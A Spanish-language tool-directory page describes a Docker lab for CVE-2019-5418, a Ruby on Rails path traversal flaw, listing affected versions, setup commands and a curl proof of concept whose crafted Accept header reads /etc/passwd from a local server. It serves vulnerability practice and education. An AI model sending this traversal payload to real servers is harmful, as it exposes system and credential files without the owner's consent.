Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/daehyeok0618/cve-2019-5418
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubdaehyeok0618/cve-2019-5418

CVE-2019-5418

Entorno de laboratorio basado en Docker para el exploit de recorrido de ruta de Ruby on Rails CVE-2019-5418, con comandos curl PoC para leer archivos arbitrarios del servidor mediante cabeceras Accept manipuladas.

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-5418: Ruby on Rails Recorrido de Ruta y Lectura Arbitraria de Archivos

Este proyecto es un entorno para practicar y reproducir la vulnerabilidad de inclusión de archivos locales (CVE-2019-5418) en Ruby on Rails. Esta vulnerabilidad permite leer cualquier archivo dentro del servidor mediante la navegación de rutas a través del encabezado Accept.

Resumen de la vulnerabilidad

Ruby on Rails es un marco de aplicación web que permite a los desarrolladores construir aplicaciones web de forma rápida y sencilla.

Las versiones de Ruby on Rails (vista de trabajo) <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 y v3 contienen una vulnerabilidad de inclusión de archivos locales.

Cuando se usa render file en un controlador para renderizar una vista fuera de la aplicación, Rails determina la ubicación del archivo basándose en el encabezado Accept proporcionado por el usuario. Al enviar un encabezado Accept con el valor Accept: ../../../../../../../../etc/passwd{{, un atacante puede explotar la vulnerabilidad de navegación de rutas para leer archivos arbitrarios.

Configuración del entorno

Ejecute los siguientes comandos para compilar e iniciar Ruby on Rails 5.2.2:

root@kitploit:~
docker compose build
docker compose up -d

Una vez que el servidor esté en funcionamiento, puede visitar la página de Ruby on Rails en http://your-ip:3000.

image1

Ejemplo de PoC

root@kitploit:~
curl -H "Accept: ../../../../../../etc/passwd{{" http://localhost:3000/robots

image2

Se ha leído exitosamente un archivo arbitrario del servidor a través del encabezado Accept.

Descargar herramienta